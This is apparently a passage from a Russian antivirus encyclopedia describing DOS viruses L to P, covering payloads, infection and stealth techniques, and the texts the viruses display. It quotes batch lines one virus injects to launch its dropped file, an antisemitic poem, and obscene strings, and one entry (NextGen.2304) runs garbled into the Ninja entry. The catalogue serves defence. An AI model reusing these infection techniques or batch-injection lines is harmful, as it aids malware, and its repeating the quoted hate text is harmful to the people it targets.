Очень опасный резидентный полиморфный вирус. Уничтожает исполняемые файлы, находящиеся в каталогах F77,MSFORT,GAMES,GAME, UTIL; записывая в их начало троянский код. Также вирус может записать в MBR троянский код, выводящий на экран текст "Hard disk destroyed by mutant-virus "LUCIFER"". Вирус содержит тексты "Virus Luce.4619 by OVER-X.", "POLYMORPHIC ALGORITHM IS CREATED BY OVER-X".

Lucifer (1,2)

Опасные нерезидентные загрузочные вирусы. При загрузке системы с инфицированного флоппи-диска вирусы заражают активный загрузочный сектор первого жесткого диска, считая, что он расположен на стороне -1, цилиндре - 0, секторе - 1. При загрузке же системы с инфицированного жесткого диска вирус пытается заразить гибкий диск в дисководе B:. Оригинальные загрузочные сектора вирусом не сохраняются. При загрузке вирусы пытаются самостоятельно найти и отдать управление системным файлам IBMBIO.COM или IO.SYS. Если данные файлы не будут найдены, то вирусы выводят сообщение: Lucifer (1) - "Sys?", Lucifer (2) - "**Oops!**" и "вешают" систему. Содержат тексты "Lucifer" и "Lucifer Messiah -- ANARKICK SYSTEMS v6.1 ©1990", или "Lucifer Messiah of Anarkick Systems v.4.3 © 1992".

Lucy.5086, 5286, 5505

Опасные резидентные полиморфные вирусы. Из-за ошибок могут разрушать инфицируемые файлы. При нахождении в памяти программ: SCAN,VSHIELD, CLEAN, FINDVIRU, GUARD,VIVERIFY,TB,AVP,VIRSTOP,NOD,HIEW,ICE,AVG,F-PROT, CHKDSK,DRWEB,TDPR.

Lust.120, 121, 137, 191, 196, 210, 258

Неопасные вирусы. Lust.210 производит поиск *.COM-файлов в текущем каталоге и записывает свой код в область повторяющихся байт в теле программы, если они имеются.

Lx.1358

Опасный резидентный вирус. 13 числа записывает в файл C:\AUTOEXEC.BAT похабный текст и команду форматирования диска C:.

LZR

Опасный загрузочный вирус. Может уничтожить содержимое жесткого диска. Имеет текст "LZR".

N

Nadym.493

Неопасный нерезидентный вирус. Иногда выводит на экран текстовую строку "[VivatNadym] v.1.0 [1998]". Также содержит текст "Proudly by [GloomyTanat]".

Nadym.934

Неопасный нерезидентный шифрованный вирус. 2 июня, 3 сентября или 1 апреля вирус выводит на экран один из следующих текстов:
[Yanush Milovski] and [GloomyTanat]
Thanks to Yana Diagileva for their songs
Thanks to Shunya for their love and hate
And Thanks You Stupid User for using our virus
Relax man ... relax ...
[VivatNadym] v.2.0 [1998]
Hello, Welcome to the Psychiatric Hotline.

Nadym.1058

Опасный нерезидентный вирус. Иногда переименовывает C:\AUTOEXEC.BAT в C:\AUTOEXEC.NAD, создает новый файл C:\AUTOEXEC.BAT.

Nameless.3000

Очень опасный резидентный шифрованный вирус. При старте инфицированной программы вирус "выкусывает" свой код из нее, запускает ее, а потом вновь заражает. Иногда, в зависимости от своих внутренних счетчиков или при неаккуратной трассировке, уничтожает содержимое жесткого диска, а также периодически уничтожает содержимое случайных секторов логических дисков. Содержит текст "Nameless virus v.2.0 Глазовская водка-лучшая в России! Завалим юзеров вирусами! Игорь, помоги назвать вирус (только не Nameless) U my last hope... Please...".

Natas.4740, 4744, 4746, 4766, 4774, 4786, 4826, 4918, 4988, 5228

Очень опасные файлово-загрузочные полиморфные вирусы. Заражают MBR "винчестера", Boot-сектора флоппи-дисков, COM и EXE-файлы. Не заражают файлы, обрабатываемые программами PKZIP, PKUNZIP, ARJ и LHA. В зависимости от своих счетчиков могут отформатировать жесткий диск. Содержат текстовые строки: "Natas" и "BACK MODEM". Natas.4746 содержит ошибку в процедуре заражения MBR и Boot-секторов дискет. В результате этого система перестанет загружаться с таких дисков и восстановление оригинальных MBR и Boot-секторов окажется невозможным. Natas.4774 имеет текст "Time has come to pay ©1994 NEVER-1". Natas.4988 содержит следующий текст:
Yes I know my enemies
They're the teatchers who taught me to fight me
Compromise, conformity, assimilation, submission
Ignorance, hypocrisy, brutality, the elite
All of whitch are American dreams
© 1994 by Never-1(Belgium Most Hated) Sandrine B.

Nax.858

Опасный резидентный вирус. Из-за ошибки разрушает инфицируемые файлы. При нажатии на клавишу F5 вирус меняет ее в буфере клавиатуры на F8 и наоборот - F8 на F5.

Nax.1402

Опасный резидентный вирус. Каждое четвертое нажатие на клавиши \/:;<>()[],.90 изменяет на /\;:><)(][.,09, а также F5->F8, F6->F8, F8->F5,Enter->Escape,Escape->Enter.

NearDark

После загрузки с жесткого диска может вывести строку "NearDark", после чего уничтожит Partition Table.

Necros.1164

Неопасный резидентный полиморфный вирус. Заражает COM-файлы, внедряя свой код в их начало. EXE-файлы заражает, как вирус-спутник. Т.е., создает COM-файл, содержащий вирусный код с именем EXE-файла. 21 ноября выводит на экран текст:
Virus V2.0 © 1991 Necros The Hacker.
Written on 29,30 June in Tralee, Co. Kerry, Ireland.
Happy Birthday, Necros!
Содержит строку "Virus V2.0 [FrIEND]".

NED-вирусы

NED (NuKE Encryption Device) - полиморфный генератор вирусных шифровщиков и расшифровщиков. Содержит текстовую строку: [NuKE] Encryption Device v1.00 © 1992 Nowhere Man and [NuKE]

NED.ItsHard

Опасный нерезидентный полиморфный вирус. В декабре пытается отформатировать 32 цилиндра первого жесткого диска, после чего перезагружает компьютер. Содержит строку IT'S HARD. SMAUG REIGNS SUPREME AS THENEW FORCE IN VIRUS WRITING. SMIRK. SMIRK. POOF!

NED.Tester

Нерезидентный полиморфный вирус. Перед заражением файла выводит текст: "Test virus successful!". Содержит строки: "*.COM", "[VCL]".

NeedLove.5000

Опасный резидентный шифрованный вирус. В вирусе присутствуют некоторые процедуры, которые никогда не получают управления. Так, видимо, в январе вирусу хотелось бы вывести на экран текст "ALL YOU NEED IS LOVE!" и запустить по экрану "бегущие" справа налево разноцветные сердца разного размера, одновременно с этим последовательно читая сектора жесткого диска, видимо имитируя разрушение информации в них.

Neko.2697

Резидентный полиморфный вирус. Отличается оригинальным алгоритмом шифрования. Помимо простого шифровщика вирус создает код, который в случайных местах уже зашифрованного вирусного кода изменяет некоторые байты и слова (XOR, ADD, SUB, INC, DEC, AND). Во вторник перед заражением файла выводит текст:
Dear Mrs.Grandy:
Aloha!
It is me,Neko again! This is the lastest version 2.0
Undoubtedly,I am not what I was.
Let me tell you something about my improvement.
I work with the Antilogic Engine I.
It is a new invention.So,
Showtime! Neko version 2.0
Made by Metal Satan

Nessuno.2170

Опасный резидентный полиморфный вирус. Разрушает, записывая в случайное место файла 21 случайный байт, файлы, расширения которых заканчиваются на буквы, указанные в следующем списке (2 последовательных символа для каждого файла): ocxtas.cppodroorsmspldakrgbfpsiprj. Содержит текст "[For pirates... ©1993-94 nessuno] sono solo stronzate".

Net.4340

Опасный резидентный вирус. Может записывать в программы троянский код, уничтожающий CMOS и сектора дисков. Содержит текст "Retix PC-21 NETBIOS".

Neurobasher.Alpha

Неопасный резидентный стелс-вирус. При старте или открытии зараженных файлов вирус удаляет свой код из них.

Neurobasher.Avalanche

Опасный резидентный шифрованный вирус. При старте файлов, содержащих словосочетания F-PR, TBAV, SCAN, MSAV, CPAV, TBME, TBFI, TBSC, VIRS, TBDR, вирус удаляет их. Содержит текст "AVALANCHE/Germany '94...Metal Junkie greets Neurobasher".

Neurobasher.Havoc (1,2)

Файлово-загрузочные полиморфные стелс-вирусы. Заражают MBR, Boot-сектора дискет и EXE-файлы. При старте зараженной программы вирусы первым делом устанавливает свою TSR-копию в память по адресу 7C00:0000, перехватывают INT 13h и INT 21h, причем при "захвате" INT 21h, вирусы могут внедрить инструкции перехода на свой обработчик в оригинальный обработчик прерывания DOS, находящийся в HMA. После этого заражают MBR "винчестера", шифруют истинный "спрятанный" в 7 секторе MBR и Boot-сектор активного раздела DOS. 9 секторов своего тела вирусы записывают начиная с 8 сектора жесткого диска. При загрузке с инфицированного жесткого диска вирусы устанавливают в память по адресу 7C00:0000 свой код, перехватывают INT 13h, INT 21h, ждут загрузки DOS, и "законным" способом (f.48h INT 21h) получают свой участок памяти. При возможности размещают себя в область UMB. Заражают дискеты емкостью 1.2M или 1.44M. Причем вирусы форматируют дополнительную 81 дорожку из 10 секторов, куда "прячут" оригинальный Boot-сектор и 9 секторов своего кода. Havoc (1) содержит ошибку в процедуре заражения Boot-секторов дискет. Правильное заражение флоппи-дисков будет происходить только в том случае, если первая команда загрузчика JMP SHORT PTR (EBh ??). Во второй модификации вируса данная ошибка исправлена.

Neurobasher.N8Fall.527

Неопасный резидентный стелс-вирус-спутник. Не заражает файлы, содержащие символы "F-" (F-PROT). Содержит текстовую строку "-A-VICTORY-THAT-WON'T-LAST-"

Neurobasher.N8Fall.4518 (1,2), 5770, 5081

Неопасные резидентные полиморфные стелс-вирусы. Устанавливают свою TSR- копию в область UMB или в верхние адреса памяти. Внедряют прямой межсегментный CALL на свой код в оригинальный обработчик DOS INT 21h. Neurobasher.N8Fall.4518 (1,2) иногда вызывает печать экрана на принтер (Int 05). Neurobasher.N8Fall.5770,5081 при завершении работы какой-либо программы (f.4Ch INT 21h) может установить в память "на INT 21h" другой стелс-вирус-спутник Neurobasher.N8Fall.527, хранящийся в теле вируса- родителя в зашифрованном виде, который в дальнейшем может "жить собственной жизнью".

Neurobasher.Tremor

Неопасный резидентный полиморфный стелс-вирус. Трассирует INT 21h. Копирует свою TSR-копию в область UMB, если это возможно. Перехватывает INT 15h, 21h, причем может не просто перехватить INT 21h, а "вклиниться" в цепочку обработчиков INT 21h. И сам перехват INT 21h и 15h довольно необычен: вирус находит в памяти PSP (префикс программного сегмента) резидентной части командного процессора и оставляет в нем по смещению 5 и 53h прямые межсегментные jump'ы соответственно на свои обработчики INT 21h, 15h. И делает ссылки векторов в таблице прерываний или значения адресов межсегментных переходов на установленные им инструкции переходов в PSP COMMAND.COM. INT 15h вирус использует для вызова видеоэффекта.Также, в некоторые моменты, вирус может "потрясти' экран.

Nexivder.4224, 4286

Неопасные файлово-загрузочные полиморфные вирусы. Заражают MBR жесткого диска, загрузочные сектора дискет и COM-файлы. В COM-файлы вирусы внедряются в середину файлов, используя трассировку для замены по случайному смещению программы определенной вирусом программной инструкции на вирусную команду передачи управления (CALL NEAR).Основной зашифрованный вирусный код размещается в конце файлов.

NextGen.2304

Неопасный резидентный стелс-вирус. Содержит текст "The NextGen Stealth Virus 6 секторов на 13 головках жесткого диска. Заражают файлы, записывая в их конец, перед основным вирусным кодом блок до 256 байт и после тела вируса, для EXE-файлов - блок до 256 байт, для COM-файлов - блок до 512 байт. С вероятностью 1/256 уничтожают программные файлы, записывая в них код, который при старте выводит следующее сообщение:
Ninja.1336: DZINA VIRUS v 4.0 Copyright © 1990,91,97 Dzina Corp

Ninja.1376:

Mutant Ninja Version 2.0 Copyright © 1990,91 Virus&Worm Software

Nki.3477

Опасный резидентный вирус. При создании файлов с расширениями AS? или DB?, вирус может удалить их или создать вместо файла директорий с таким же именем. При нахождении в левом верхнем углу экрана буквосочетания "AX", вирус подставляет вместо вызванной функции INT 21h функцию удаления файла (f.40h Int 21h). Иногда выводит текст "No Viruses" и рисует на экране диагональные черно-белые полосы.Содержит зашифрованный текст "Николаевский Кораблестроительный институт. Oct(123,123,126) by one of student".

Nocopy.3695

Неопасный резидентный шифрованный вирус. Заражает EXE-файлы при их старте или при обращении к ним. Создает файл C:\NOCOPY.COM, содержащий вирусный код и вставляет строку C:\NOCOPY в начало файла AUTOEXEC.BAT. Корректирует MBR жесткого диска таким образом, чтобы после загрузки системы вирус смог бы узнать адрес INT 13h в ПЗУ.

NoDBF.1000

Опасный резидентный вирус. Блокирует обращение к файлам *.DBF.

NoGraph.784

Опасный резидентный вирус. Может запретить графический режим монитора. Возможен вывод случайных символов на экран, зависание или перезагрузка системы, изменение контрольной суммы CMOS-памяти.

Noki.448

Опасный резидентный вирус. Записывает свой код в 17 сектор жесткого диска, записывает 39 байт своего кода в область векторов прерываний по адресу 0:210h, "перехватывает" INT 21h. При старте файлов (f.4Bh Int 21h) вирус считывает 17 сектор, содержащий вирусный код в область видеопамяти BD00:0000, проверяет является ли запускаемая программа EXE- файлом и считывает 448 байт из области стека данной программы в память. Если данные 448 байт состоят из нулевых байт, то вирус записывает свой код в данное место программного стека, не изменяя длины пораженного файла. 23 числа нечетного месяца вирус уничтожает MBR жесткого диска. Вирус содержит строку "NOKI", которая выполняется как инструкции процессора.

Nomenklatura.1024

Неопасный резидентный вирус. Содержит тексты "Nomenklatura', "Този дебел идиоІ вме±Іо да ¶еліне ±о·ниІе і±Іни на моми·еІо, впи і±Іни Іам, кєдеІо І°їбваёе да ±ложи ±єв±ем д°іго не№о".

Noon.1163

Неопасный резидентный вирус. В 12.00 имитирует сигналы точного времени радиопрограммы "Маяк". Содержит зашифрованный текст "byMH&MHsoftware".

NoRemorse.1319

Опасный нерезидентный шифрованный вирус. COM-файлы заражает, внедряя свой код в начало файлов. EXE-файлы заражает, как вирус-спутник, присваивает оригинальному EXE-файлу расширение WIT и создает вирусный файл с именем и расширением исходного файла. В EXE-файлы, имеющие расширение COM (кроме файла CO*.COM), вирус записывает троянский код, который выводит сообщение "ЫІ±°±ІЫ NO REGRET ЫІ±°±ІЫ" и "вешает" систему. 15 апреля или 50-ое поколение вируса уничтожает содержимое CMOS - памяти, выводит текст "Корабелка - rulez forever !" и "перезагружает" систему. Уничтожает файлы: *.°*,chklist.*,anti-vir.dat, msav.chk, *.avb, *.log, tbscan.sig, smartchk.cps, *.ms. Содержит текст "Virus NoRemorse v1.8. Copyright © by Wit 1996.".

November 17.768

Очень опасный резидентный вирус. В ноябре после 17 числа уничтожает содержимое 8 первых секторов текущего диска.

Npuxogum.1176, 2025, 2036

Неопасные резидентные вирусы. 1 апреля производят вывод на экран некоторой графической шутки.

NRLG.based

Данные вирусы сконструированы с помощью вирусного конструктора NRLG (NuKE RANDOMIC LIFE GENERATOR), позволяющего создавать резидентные полиморфные вирусы, заражающие COM-файлы. А также позволяют задавать наличие в вирусах всевозможных текстовых строк, видеоэффектов и деструктивных функций.

Nsd.266

Неопасный нерезидентный вирус. Иногда выводит текст "SYSTEM ERROR: DMA DENIED." и, как правило, "вешает" систему. Также имеется строка "NSD".

Nsi.1509

Очень опасный резидентный вирус. Уничтожает *.PA? - файлы. Содержит тексты "I'm sorry", "In & For NSI", "Nikolaev".

NTU.Cawber

Неопасный резидентный шифрованный вирус. Содержит тексты:
T4
Griffe
T4 virion ДДДДД by NTU BACTERIOPHAGE LAB
There Once Was A King, Who Called For The Spring
For His World Was Still Covered In Snow
But The Spring Had Not Been, For He Was Wicked And Mean ...
Here I'm Sitting And It's Getting Cold
The Morning Rains Against My Window Pane
While The World Looks So Cold And Grey
In My Mind I Dream Away
Then I'm On My Way To Tropic Islands
You'd Always Say I Was A Dreamer
You Were Right
What Do I Say When It's All Over ?
And SORRY Seems To Be The Hardest Word ...

NTU.L'amour

Опасный резидентный полиморфный стелс-вирус. 13 сентября уничтожает содержимое CMOS-памяти и секторов жесткого диска. Содержит текст "L'AMOUR v1.1 by NTU BACTERIOPHAGE LAB S/N TM1-", далее идет номер поколения вируса.

NuKE.Pox.609

Опасный резидентный шифрованный вирус. 24 числа при нажатии на клавишу Del вирус форматирует 32 цилиндра жесткого диска. Содержит текст "© Rock Steady/NuKE".

Nuker.Trance.1688, 1982

Nuker.Trance.1982 - опасный вирус. Иногда может записать в случайный сектор диска строку "This sector has been fucked up courtesy of Tranceэ Virus © 1995 by The Nuker". Nuker.Trance.1688 1-го числа производит "осыпание" экрана (см. Cascade.1701), содержит строку "Trance Virus © 1995 by The Nuker".

Nutcracker.512 (1,2)

Опасные загрузочные вирусы. Шифруют первый сектор подкаталогов (см. Nutcracker.AB2.6425).

Nutcracker.AB3

Опасный резидентный вирус. 12 января и 23 июля уничтожает по 40 секторов логических дисков C:, D:, E:, F:, G:. Запоминает в своем теле дату старта вируса и через 23 дня замедляет вывод на экран, "перехватывает" INT 10h (вывод на экран) и производит холостой цикл. Содержит текст "Nutcracker(AB3)".

Nutcracker.AB4

Очень опасный резидентный вирус. Записывает в MBR жесткого диска "троянский" код, который 12 января и 23 июля форматирует первые дорожки первого и второго жесткого дисков. Также при старте любой программы, резидентная копия вируса увеличивает счетчик, находящийся в загрузочном секторе текущего диска по смещению 10.При достижении счетчиком значения 64, вирус обнуляет его и создает на данном логическом диске псевдосбойный кластер. Содержит текст "Sombre Nutcracker(AB4).

Nutcracker.AB5.2725, 2900, 3139

Очень опасные резидентные вирусы. Пытаются быть невидимыми. При каждой 16 стартующей программы уничтожают один случайный сектор на текущем диске. Уничтожают файлы с расширениями *.MS и *.?AS и таблицы ревизора диска ADinf. Не заражают файлы с именами, начинающимися на IB и CO. Записывает в MBR жесткого диска "троянский" код, который после 512 загрузок с жесткого диска может уничтожить информацию на жестком диске и в CMOS-памяти.

Nutcracker.AB6 (1-4)

Очень опасные резидентные файлово-загрузочные вирусы.12 января пытаются отформатировать первый жесткий диск,после чего выводят на экран тексты:
Nutcracker.AB6 (1) - "Dreary Nutcracker(AB6)"
Nutcracker.AB6 (2) - "Dreary Nutcracker(AB6) Lives"
Nutcracker.AB6 (3) - "Dreary Nutcracker(AB6) Lives Again"
Nutcracker.AB6 (4) - "Dreary Nutcracker(AB6) lives forever !".
Иногда изменяют символы, выводимые на печать, либо совсем блокируют вывод на принтер. Удаляют файлы, имеющие расширения FW, ?AS и MS (в последнем варианте вирус содержит ошибку). Содержат зашифрованный текст "Любовь Н.".

Nutcracker.AB7 (1,2)

Неопасные резидентные файлово-загрузочные вирусы. Заражают MBR жесткого диска, загрузочные сектора дискет и EXE-файлы, при их создании. EXE- файлы заражаются, если их длина не более 64K. Вирусы переводят их в формат COM-файла, внедряя в начало заголовка JUMP на свое тело и в дальнейшем самостоятельно настраивая адреса таблицы перемещаемых символов. При загрузке с инфицированного диска вирусы оставляет свою копию резидентно в памяти (по возможности в области UMB) и перехватывают INT 9,13h,15h,21h,2Fh,40h. При нажатии на Ctrl-Alt-Del вирусы проверяют наличие своего кода в MBR и заражают его. При вызове функции AH=13h INT 2Fh (получить адрес дискового драйвера) вирусы самостоятельно удаляют себя из MBR. 12 числа нечетного месяца при загрузке системы выводят сообщение "I'm Nutcracker(AB7)!", ждут нажатия на клавишу и продолжают загрузку системы.

Nutcracker.Info.2133, 2142, 2259

Неопасные резидентные вирусы-черви. При старте инфицированной программы вирусы выводят тексты:
Nutcracker.Info.2133:
InfoSystem version1.02
Reading System Information...
Computer type: IBM PC
Nutcracker.Info.2142:
-*- INFOSYSTEM -*-
version 1.04
© 1995 by Ziff Co.
Reading System Information...
Computer type: IBM PC
Nutcracker.Info.2259:
Reading System Information...
Computer type: IBM PC
после этого вирусы проверяют тип компьютера и печатают одну из следующих строк: "Original", "XT", "AT", "Convertible", "PS/2","Junior" или "Unknown". Далее выводится текст:
Checking HDD controller...
SCSI controller type: Unknown (Error14)
и производится заражение системы. Вирус создает в каталогах, отмеченных через переменную "PATH", файл INFO.COM (или INFOSYS.COM), содержащий вирусный код. Затем он (вирус) производит поиск *.BAT-файлов и записывает в их начало команды:
@if not exist info.com goto noinfo
@info>nul
:noinfo
или:
@if not exist infosys.com goto noinfo
@infosys>nul
:noinfo
При запуске такого BAT-файла производится запуск файла INFO.COM (или INFOSYS.COM) и, следовательно, управление получает вирусный код. Этот вирусный код размещает свою резидентную копию в памяти и "перехватывает" INT 1Ch и INT 21h. При попытке доступа к измененным вирусами BAT-файлам вирусы включают свои стелс-процедуры. При запуске программ CHKDSK, WEB или DRWEB вирусы отключают свои стелс-режимы

P

Palma

Неопасный загрузочный стелс-вирус. При заражении MBR жесткого диска использует прямое программирование контроллера жесткого диска. Содержит текст "Palma5.".

Pamyat.2000 (1-5)

Неопасные нерезидентные шифрованные вирусы. При обнаружении в окружении программы (ENVIRONMENT) строки "OBSHCHESTVO="Память"" вирусы выводят текст:
ВНИМАНИЕ ! ! ! Эта программа заражена моим вирусом !
Во избежание недоразумений система завешена.

1 декабря выводят текст:

Я люблю Таню !
Поздравляю её с днем рождения !
или:
Сей вирус посвящен Тане.
Поздравляю её с днём рождения !
Таня, я люблю тебя !!!
или:
Сей безобидный вирус посвящён Тане.
Поздравляю её с днём рождения !
Таня, я очень люблю тебя !!!
В сентябре Pamyat.2000 (3) выводит текст:
Сия программа заражена вирусом.
Покупайте AIDSTEST !
Pamyat.2000 (5) по средам в ноябре выводит текст:
Радуйтесь, люди: скоро у Тани будет день рождения.
После 1 сентября в понедельник также может быть выведен текст:
Два Рима пали, третий есть, а четвертому - не быть !
Содержат в своем теле строку "Новосибирск, 6 - 8 - 1996. Version 3b"
или "Новосибирск, 17-10-1996. Version 3d", или "Новосибирск,
8-11-1996. Версия 3e.".

Pamyat.3000 (1,2)

Очень опасные нерезидентные шифрованные вирусы. При обнаружении в окружении программы (ENVIRONMENT) строки "OBSHCHESTVO="Память"" вирусы выводят текст:
ВНИМАНИЕ ! ! ! Сия программа заражена моим вирусом !
Во избежание недоразумений система завешена.
"Обрезают" файлы форматов NewExe (NE) и PortableExe (PE) до 1024 байт и в DOS-заголовок этих файлов вирусы записывают код, выводящий на экран текст "This program must be run under OS/2.". В файл DRWEB.EXE вирусы записывают код, завершающий работу программы. 1 декабря выводят текст:
Очередной вариант сего безобидного вируса снова посвящён Тане.
Таня, поздравляю тебя с днём рождения !
Таня, я очень люблю тебя !!!
3 апреля - следующий текст:
Мы проклинаем в ответ непотребное племя евреев,
Что над собою творит гнусный, бесстыдный обряд,
Глупых теорий источник, с холодной субботой на сердце -
Сердце ж ещё холодней самой религии их.
Каждый седьмой они день пребывают в позорном бездельи -
Вялый, ленивый их Бог в этом им деле пример.
Прочие выдумки их - лишь рабов легковерных утеха:
Умный ребёнок - и тот им бы поверить не мог.
Пусть бы несущее ужас оружье Помпея и Тита
Не покоряло совсем нам иудейской страны!
Вырвав из почвы, заразу по белому свету пустили -
И победитель с тех пор стонет под игом раба.
Рутилий Намациан
"De reditu suo"
Содержат текст "Новосибирск, 31-03-1997. Версия 3f.".

Panda.1062, 1070

Неопасные нерезидентные шифрованные вирусы. В воскресенье пытаются вылечить инфицированные файлы. Panda.1070 содержит текст "Hi!PD".

Pande.1516, 1520, 1532

Неопасные резидентные стелс-вирусы. По возможности устанавливают свои резидентные копии в область UMB. При запуске программ из списка (по 2 буквы на имя) F-TBARRALHPKCH отключают свои стелс-процедуры. Содержат тексты "pandemonium by retch", "17/04/96".

Parity (1-3)

Неопасные Boot-вирусы. Иногда выводят на экран сообщение "PARITY CHECK" и "вешают" систему. Переживают "теплую" перезагрузку (Ctrl-Alt-Del).

Paulus.1804

Опасный резидентный вирус. Может изменять на экране монитора большие буквы на маленькие, а также при нажатии на Ctrl-Alt-Del может вывести текст "Paulus de DOSkabouter lives here..." и "завесить" систему. Имеет текст "© MeThOxY 1996".

PeaceKeeper.3820

Опасный резидентный полиморфный вирус. Заражает COM и EXE-файлы. В COM- файлы вирус внедряется по методу вируса CommanderBomber. Иногда вирус может уничтожить boot-сектор диска A:, записав в область загрузчика код, который выводит на экран текст:
Peace-Keeper Virus V2.10
Written by Doctor Revenge 18-May-1994 , Italy
и "вешает" систему. Также вирус содержит тексты "[MCG v0.31с]" и "SCCLVIVSMSCPF-IMVHTB". Вирус не заражает файлы, содержащие первые 2 буквы, указанные в последней строке.

Peach.887

Резидентный вирус. Уничтожает файлы CHKLIST.CPS. Иногда записывает текстовую строку "Roy CuatroNo 2 Peach GardenMeyer Rd. Spore 1543" по адресу 0040:00FC.

Peel.334

Опасный нерезидентный вирус. При неаккуратной трассировке уничтожает содержимое 720 секторов диска C:. Периодически устанавливает признак неактивного (незагружаемого) раздела для первого логического диска в таблице разделов (partition table), в MBR.

Pest.2743

Опасный резидентный полиморфный вирус. 13 числа может уничтожить 256 секторов первого жесткого диска. Содержит текстовые строки "Pest © 12/10/93 by (and best wishes from) PRIEST Int., Gbw/Germany", "ASCECLHVSPF-ACPRVINWI".

Phalcon.894

Опасный нерезидентный вирус. В марте форматирует случайные диски. По понедельникам оставляет в памяти "на таймере" (INT 08) резидентный код, который постоянно вызывает INT 1Ah (получение системного времени).

Phalcon.BobRoss.1110, 1117 (1,2), 1133

Неопасные нерезидентные вирусы. 9 июля оставляют в памяти резидентный код, который примерно через 4.5 часа выводит в верхнем левом углу экрана поочередно тексты:
Bob Ross lives!
Bob Ross is watching!
Maybe he lives here...
What a happy little cloud!
Maybe he has a neighbour right here...
You can make up stories as you go along.
или Phalcon.BobRoss.1117 (2):
DR.LOH ! lives!
Don`t the PANIC !!!!!
WEB is LOH & Penis...
Please WAIT! HDD format WAIT!!!
MikeMutationEngine ©MikeHacker
(DR.LOH is best of the best VIRUS !!!!!!
В теле вирусов также имеется текст "PHALCON".

Phalcon.Dcool

Неопасный нерезидентный вирус. Оставляет в памяти резидентный код, который выводит следующий текст:
SHALOMKnock... Guess who's There...
Fuck Asi Azulay and Lior Cohen ...
It's Dr. Unknown...
Fuck Guy Assado for Distributing my Sources...
Use XOPEN, MAN!!! FUCK Stick-Buster!!!
ViSiON-X is Some C00L Program !!!
Call to Support board: +972-X-XXXXXX !!!
TNTVIRUS is SHIT!!! Cpav is SHIT!!! Use McAfee!
But... McAfee is SHIT too...
Borland is the BEST...
Too bad, you didn't make Backup for your HD...
I Wonder, What INT 13h Does with AH=05...
Just kiddin'... Ya know?
GUY ASSADO IS MONGOL!!!
COOLNESS is FOREVER!!!
Также содержит строку "D-C00L-1 ViRUS".

Phalcon.Maria

Опасный нерезидентный вирус. 2 числа месяца уничтожает случайные сектора диска. Оставляет в памяти резидентный код, который выводит текст:
Maria K lives..
Somewhere in my heart..
Somewhere in Sweden..
I might be insane..
But the society to blame..
The Unforgiven / Immortal Riot

Phalcon.Psychosis

Неопасный нерезидентный вирус. 6 июня оставляет в памяти резидентный код, который через 5 минут выводит текст:
Another year passed by
Another tear the willows cry
to change the world we ever try
to make a difference before we die
[PSYCHOSIS] Greets, Phalcon/Skism.
© 93/94 The Unforgiven / Immortal Riot
Содержит также текстовую строку:
\\ Merry Xmas and a happy new year // Sweden - Snowing Again

Phantom1.7000 (1-4), 7100, 7160

Полиморфики. Если около 20 минут не было нажатий на клавиши выводят следующую картинку.
Затем на фоне надписи "PHANTOM 1" появляется бегущая строка "Congradulations!!! Your computer is now infected with a high performance PHANTOM virus! Coming soon: next virii based on the _C00LEST_ mutation engine all over the world: the Advanced Polymorphic Engine! Enjoy this intro! © 1994 by Dark Prince.".

Phardera.5824

Hеопасный резидентный полиморфный вирус. 10 числа каждого месяца выводит текст "Phardera + Dianita". Содержит также текст:
Phardera
-by Phardera'95-----Batavia--------Indonesia----
RaredrahP Dianita

PHB.4315, 4461

PHB.4315 очень опасный нерезидентный вирус. Производит поиск всех файлов и уничтожает их содержимое, записывая в них свой вирусный код, не сохраняя оригинальную информацию. PHB.4461 неопасный нерезидентный вирус. По окончании работы вирусы выводят сообщение "Thank you for viewing Patty Hoffman's Boobs!". Содержатся также тексты:
PHB.4315:
Patty Hoffman's Boobs! Virus version 1.0 Copyright © 1993 by Cerebral
Quantas. Made in Canada, Eh! July 4, 1993.
PHB.4461:
[Patty's Boobs Virus] v2.5 Copyright © 1993 by Cerebral Quantas. Made
in Canada, Eh! January 27, 1993.

PhisDept.6294

Очень опасный резидентный вирус. Перехватывает INT 03,20h,21h,27h,2Fh, 80-84h. Заражает COM и EXE-файлы при их запуске. При заражении файлов производит эмуляцию 1000 первых байт программного кода - анализирует и копирует каждую команду в свой буфер и выполняет данную инструкцию. Вместо любой команды может вставить вызов прерывания INT 03 (CCh) или INT 80-84h (CDh 80-84h). Т.к., данные прерывания вирусом "захвачены", то вирус считает, что это "внедренные" им инструкции и подставляет вместо них сохраненные ранее в теле вируса 2 байта. 27 февраля, 20 июня и 9 мая, при старте MS-Windows в режиме 286 (enhanced 286) вирус может вывести текст:
У И Н Д О У З-ДУРА. © Copyright Kovalevsky & Co, MSU PhisDept.
Happy birthday to us.
А также может послать модему следующие команды управления "ATM2", "ATL3M0Q0X4S7=5DP9W", "ATS7=30DP8W1018094745268". Последняя команда - попытка позвонить в Калифорнию. Содержит тексты "AntiAidstest. ©Copyright Kovalevsky & company.", "AntiLozinsky.", "Лозинский-ЧМО", "COMMAND.COM ".

Phonix.927

Опасный резидентный вирус. При старте инфицированного файла вирус пытается заразить командный процессор (COMMAND.COM). Инсталлируется в память вирус только из командного процессора. Заражает COM и EXE-файлы при их закрытии (f.3Eh Int 21h). В пятницу 13 числа вирус уничтожает содержимое 14 цилиндров жесткого диска и выводит строку "PhФnix".

Phx.823, 965

Опасные резидентные вирусы. При записи в файлы (f.40h INT 21h) могут испортить последний байт данных. Содержат строку "PHX".

Pieck.2016

Неопасный файлово-загрузочный вирус. 3 марта выводит сообщение "Podaj haslo ?" и ждет ввода символов. Если ввести "pieck", то вирус выводит текст "Pozdrowienia dla wychowankow Pieck'a." и продолжает свою работу. Если же будет введено какое-либо другое слово, то вирус выводит сообщение "Blad !" и "вешает" систему.

Pindonga.3550, 3652

Опасные резидентные полиморфные вирусы. 16 сентября, 25 февраля, 21 марта и 27 августа вирусы уничтожают содержимое двух первых жестких дисков и выводят текст:
PINDONGA Virus V5.6. (Hecho en ARGENTINA)
Programado por Otto (16977)
Saludos a MAQ-MARIANO-SERGIO-ERNESTRO-COSTRA-PABLIN
PD: Alguien mate a Bill Gates (El WINDOWS SE CUELGA)
PINDONGA Virus (Programado por OTTO en ARGENTINA) 16977.

Pixel.1268, 1271

После заражений файлов просит ввести пароль "ENTER THE PASSWORD: ". Если ввести фразу отличную от "Ken Sent Me", то вирус выведет текст "YOU HAVE ENTERED THE WRONG PASSWORD!!" и возвратит управление DOS. Содержит также текст "PreComFileRunSyndrome 1993".

Pixel.Flea.1577, 1647

Очень опасные вирусы. Уничтожают некоторые файлы, записывая в них код вируса Dir-II. Уничтожают содержимое текущего диска или случайных секторов диска.

